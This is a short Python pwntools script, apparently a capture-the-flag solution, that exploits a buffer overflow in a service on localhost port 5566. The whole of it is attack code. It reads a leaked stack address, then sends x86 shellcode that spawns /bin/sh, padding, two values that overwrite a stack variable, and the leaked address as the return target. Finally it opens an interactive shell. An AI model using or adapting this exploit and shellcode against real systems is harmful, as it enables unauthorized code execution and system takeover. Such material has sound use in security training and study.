from pwn import *r = remote("127.0.0.1",5566)addr = r.recvline()[6:16]shel

1. from pwn import *
2.  
3. r = remote("127.0.0.1",5566)
4.  
5. addr = r.recvline()[6:16]
6.  
7. shellcode = "\x6A\x68\x68\x2F\x2F\x2F\x73\x68\x2F\x62\x69\x6E\x89\xE3\x31\xC9\x6A\x10\x58\x48\x48\x48\x48\x48\x99\xCD\x80"
8.  
9. var_64_33333 = p32(0x475a31a5)+p32(0x40501555)
10.  
11. buf = shellcode + 'a'*101 + var_64_33333 + p32(int(addr,16))*10 + '\n'
12.  
13. r.send(buf)
14.  
15. r.interactive()